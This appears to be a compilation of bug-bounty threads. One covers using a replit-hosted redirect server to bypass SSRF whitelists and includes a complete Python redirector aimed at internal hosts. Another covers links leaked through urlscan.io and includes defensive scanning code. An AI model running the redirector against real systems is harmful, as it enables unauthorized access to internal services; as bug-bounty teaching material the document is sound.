Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report.
Spinning up a server just to serve a redirection header is time-consuming and not much fun.
There's an easy alternative 🧵
While exploring some options online I came across replit.com. Their product offers a pretty easy way to spin up a server with whatever technology you'd like, and to control the files and source code of your application.
Then, in the top-right corner, we'll have our constructed URL to use as the payload against the target; it should look something like *.repl.co
So in a matter of ~2 minutes we have our own DNS name serving a redirection payload that we can point directly at internal assets of our target, cool!
After submitting our payload at the injection point, we can watch the interactive console at the bottom right of the page: the incoming request (or its absence) tells us whether the target's fetcher reached our server, whether it followed the redirect, and therefore whether we managed to increase the SSRF impact and everything is set up correctly.
This is mostly useful for SSRF endpoints protected by heavy whitelisting or regex mitigations: the validation is applied to our whitelisted-looking hostname, but if the vulnerable fetcher follows redirects, the request it actually makes lands on the internal asset, which opens up numerous bypass chains.
It helped me to successfully hit internal assets at the H1-407 Live Hacking Event.
TLDR:
Hosting a redirection machine for whitelisting-bypass scenarios should take no longer than 2 minutes:
1. Create a repl.it server with any technology
2. Edit the source code so it answers with a redirect to the internal target
3. Use the constructed DNS payload on your target
4. Debug in the console
5. Win
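The redirection server from step 2, written out as an added example (this is not the thread author's code or replit's). It assumes a replit-style PORT environment variable, a hypothetical REDIRECT_TARGET variable for the internal asset (the 127.0.0.1:8080 default is a placeholder), and a hypothetical ?to= override; everything else is the Python standard library. Each hit is logged with the caller's IP and User-Agent so the console shows whether the target's fetcher actually arrived, which is the debugging step from the thread.

```python
"""Minimal HTTP redirector for SSRF whitelist-bypass testing (added example).

The hostname the target validates is this server's public name; the request
it then makes, if it follows redirects, goes to the internal target.
"""
import logging
import os
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Hypothetical default: point REDIRECT_TARGET at the internal asset you are after.
DEFAULT_TARGET = os.environ.get("REDIRECT_TARGET", "http://127.0.0.1:8080/")


def redirect_target(request_path, default=DEFAULT_TARGET):
    """Pick the redirect destination for one request.

    A ?to=<url> query parameter (hypothetical) overrides the default so one
    server can be reused for many internal targets. Caveat: that parameter is
    visible in the URL you submit to the target, so if the filter inspects the
    whole URL rather than just the hostname, omit it and bake the target into
    REDIRECT_TARGET instead.
    """
    params = parse_qs(urlparse(request_path).query)
    return params.get("to", [default])[0]


def redirect_response(request_path, default=DEFAULT_TARGET, method="GET"):
    """Return (status, headers) for the redirect.

    302 is what most fetchers follow; 307 preserves method and body, which
    matters when the SSRF is triggered by a POST you want replayed internally.
    """
    status = 307 if method in ("POST", "PUT", "PATCH") else 302
    location = redirect_target(request_path, default)
    return status, [("Location", location), ("Content-Length", "0")]


class Redirector(BaseHTTPRequestHandler):
    def _redirect(self):
        # Drain any request body so the connection stays well-formed.
        self.rfile.read(int(self.headers.get("Content-Length") or 0))
        status, headers = redirect_response(self.path, method=self.command)
        # Source IP and User-Agent identify the target's fetcher in the console.
        logging.info("%s %s %s UA=%r -> %d %s", self.client_address[0],
                     self.command, self.path, self.headers.get("User-Agent"),
                     status, dict(headers)["Location"])
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()

    do_GET = do_HEAD = do_POST = do_PUT = do_PATCH = _redirect

    def log_message(self, fmt, *args):
        # Suppress the default per-request log; the line above is more useful.
        pass


def serve(port):
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
    HTTPServer(("0.0.0.0", port), Redirector).serve_forever()


if __name__ == "__main__":
    # PORT is the variable replit-style hosts set; the fallback is an assumption.
    serve(int(os.environ.get("PORT", "8080")))
```

If the target's fetcher never shows up in the log, the filter rejected the URL before any request was made; if it shows up but nothing happens afterwards, the fetcher most likely does not follow redirects, and this trick will not help on that endpoint.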
I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims.
Curious how this happens? 👇
#BugBounty
Major organizations globally use various tools to enhance their email security.
Two common approaches are passive and active detection of potential malware within incoming emails.
One popular tool for "sandboxed" evaluation of a link's legitimacy is urlscan.io.
Security vendors around the world use it, often under the hood within their own very expensive products.
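One check a defender can run themselves, as an added example that is not part of the thread: it assumes, as the thread implies, that links submitted to urlscan.io can show up in its public search results, and that the search API at https://urlscan.io/api/v1/search/ returns JSON with results[].page.url and results[].task.time (both are my assumptions about that API, not something the thread states). The sample results are constructed; the heuristic for "sensitive" links (secret-looking query parameter names, long opaque path or query values) is mine.

```python
"""Flag emailed-style links for your own domain that appear in public scan results (added example)."""
import json
import re
from urllib.parse import parse_qs, quote, urlparse

# Query parameter names that commonly carry one-time secrets in emailed links.
SECRET_PARAMS = {"token", "reset_token", "code", "key", "sig", "signature", "invite", "auth", "otp"}
# Long opaque strings (at least 24 url-safe chars) that look like capability tokens.
OPAQUE = re.compile(r"[A-Za-z0-9_\-]{24,}")


def looks_opaque(value):
    """Require a digit so readable slugs like a long article title do not match."""
    return bool(OPAQUE.fullmatch(value)) and any(c.isdigit() for c in value)


def is_sensitive_link(url):
    parts = urlparse(url)
    for name, values in parse_qs(parts.query).items():
        if name.lower() in SECRET_PARAMS or any(looks_opaque(v) for v in values):
            return True
    return any(looks_opaque(seg) for seg in parts.path.split("/"))


def in_scope(host, own_domain):
    host = (host or "").lower()
    return host == own_domain or host.endswith("." + own_domain)


def search_url(own_domain, size=100):
    """Search endpoint URL (assumed shape); fetch it with an HTTP client of your choice."""
    return f"https://urlscan.io/api/v1/search/?q={quote('domain:' + own_domain)}&size={size}"


def find_leaked_links(search_json, own_domain):
    """Return (url, submitted_at) for every sensitive-looking in-scope URL in the results."""
    leaked = []
    for result in search_json.get("results", []):
        url = result.get("page", {}).get("url", "")
        if in_scope(urlparse(url).hostname, own_domain) and is_sensitive_link(url):
            leaked.append((url, result.get("task", {}).get("time")))
    return leaked


# Constructed sample in the assumed search-API shape; the hosts and tokens are made up.
SAMPLE_RESULTS = json.loads("""
{"results": [
  {"page": {"url": "https://mail.example.com/reset?token=b9e2f1c4a7d3e6f0b1c2d3e4"},
   "task": {"time": "2023-01-02T10:00:00.000Z"}},
  {"page": {"url": "https://www.example.com/pricing"},
   "task": {"time": "2023-01-02T11:00:00.000Z"}},
  {"page": {"url": "https://app.example.com/invite/Xy7Qp2Lm9Rt4Vw8Zb1Nc3Hd6Kf0"},
   "task": {"time": "2023-01-03T09:30:00.000Z"}},
  {"page": {"url": "https://example.net/login?token=abc"},
   "task": {"time": "2023-01-03T12:00:00.000Z"}},
  {"page": {"url": "https://docs.example.com/password-reset-guide"},
   "task": {"time": "2023-01-04T08:00:00.000Z"}}
]}
""")

if __name__ == "__main__":
    for url, when in find_leaked_links(SAMPLE_RESULTS, "example.com"):
        print(when, url)
```

Anything this reports was visible to whoever could query the scanner, so the corresponding tokens should be treated as burned and rotated; the longer-term fix is on the sending side (short-lived tokens, one-time use, and keeping the secret out of the URL where possible).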
Should you buy a "Comprehensive Bug Bounty course"? There are definitely some good courses out there.
That said, I wouldn't buy any course from a person without clear proof of BB/PWN reputation.
And if you want to start and do it the right way, jump on this book as a start.
Thinking of buying a subscription to an online recon framework with a nice GUI? There are a few providers out there. It can be a good start for newcomers, but by no means should it cost more than ~$20 a month.